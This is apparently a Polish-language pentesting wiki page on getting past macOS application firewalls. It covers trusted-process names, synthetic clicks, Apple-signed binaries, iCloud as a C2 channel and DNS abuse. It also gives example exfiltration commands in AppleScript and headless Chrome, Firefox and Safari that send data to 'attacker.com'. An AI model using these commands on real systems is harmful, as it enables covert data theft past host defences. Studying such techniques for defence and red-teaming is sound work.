macOS Bypassing Firewalls

Found techniques

Następujące techniki zostały znalezione w działających aplikacjach zapory macOS.

Abusing whitelist names

• Na przykład nazywając złośliwe oprogramowanie nazwami dobrze znanych procesów macOS, takich jak launchd

Synthetic Click

• Jeśli zapora prosi użytkownika o pozwolenie, spraw, aby złośliwe oprogramowanie kliknęło na zezwól

Use Apple signed binaries

• Takie jak curl, ale także inne, takie jak whois

Well known apple domains

Zapora może zezwalać na połączenia z dobrze znanymi domenami Apple, takimi jak apple.com lub icloud.com. A iCloud może być używany jako C2.

Generic Bypass

Kilka pomysłów na próbę obejścia zapór

Check allowed traffic

Znajomość dozwolonego ruchu pomoże zidentyfikować potencjalnie białe listy domen lub które aplikacje mają do nich dostęp.

lsof -i TCP -sTCP:ESTABLISHED

Wykorzystywanie DNS

Rozwiązywanie DNS odbywa się za pomocą mdnsreponder podpisanej aplikacji, która prawdopodobnie ma pozwolenie na kontakt z serwerami DNS.

Poprzez aplikacje przeglądarkowe

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Via wstrzykiwanie procesów

Jeśli możesz wstrzyknąć kod do procesu, który ma prawo łączyć się z dowolnym serwerem, możesz obejść zabezpieczenia zapory:

Odniesienia

• https://www.youtube.com/watch?v=UlT5KFTMn2k